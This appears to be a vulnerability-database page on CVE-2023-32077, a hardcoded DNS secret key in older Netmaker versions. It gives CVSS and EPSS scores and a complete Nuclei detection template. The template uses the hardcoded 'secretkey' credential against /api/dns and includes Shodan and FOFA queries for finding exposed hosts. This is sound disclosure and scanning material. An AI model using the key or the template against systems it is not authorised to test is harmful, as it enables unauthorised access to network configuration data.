Netmaker - Hardcoded DNS Secret Key

2024-04-2912:54:31

ProjectDiscovery

github.com

netmaker vulnerability dns-key exposure cve2023 info-key

CVSS3

7.5

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

EPSS

0.136

Percentile

95.7%

JSON

Netmaker makes networks with WireGuard. Prior to versions 0.17.1 and 0.18.6, hardcoded DNS key usage has been found in Netmaker allowing unauth users to interact with DNS API endpoints.

id: CVE-2023-32077

info:
  name: Netmaker - Hardcoded DNS Secret Key
  author: iamnoooob,rootxharsh,pdresearch
  severity: high
  description: |
    Netmaker makes networks with WireGuard. Prior to versions 0.17.1 and 0.18.6, hardcoded DNS key usage has been found in Netmaker allowing unauth users to interact with DNS API endpoints.
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2023-32077
    cwe-id: CWE-798,CWE-321
    epss-score: 0.08146
    epss-percentile: 0.94315
    cpe: cpe:2.3:a:gravitl:netmaker:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: gravitl
    product: netmaker
    shodan-query:
      - html:"netmaker"
      - http.html:"netmaker"
    fofa-query: body="netmaker"
  tags: cve,cve2023,info-key,netmaker,exposure,gravitl

http:
  - method: GET
    path:
      - "{{BaseURL}}/api/dns"

    headers:
      Authorization: "x secretkey"

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(header, "application/json")'
          - 'contains_all(body, "{\"address\":", "\"network\":", "\"name\":")'
        condition: and
# digest: 4b0a004830460221008d63b3ce01cf22987b6cf64df037911bfc94b9680dab796149106c4f2f5d77d5022100eac15d1f9d58ec0bfff470c26143a947c37a8eddb07d75c9f73b28c07ee0c1df:922c64590222798bb761d5b6d8e72950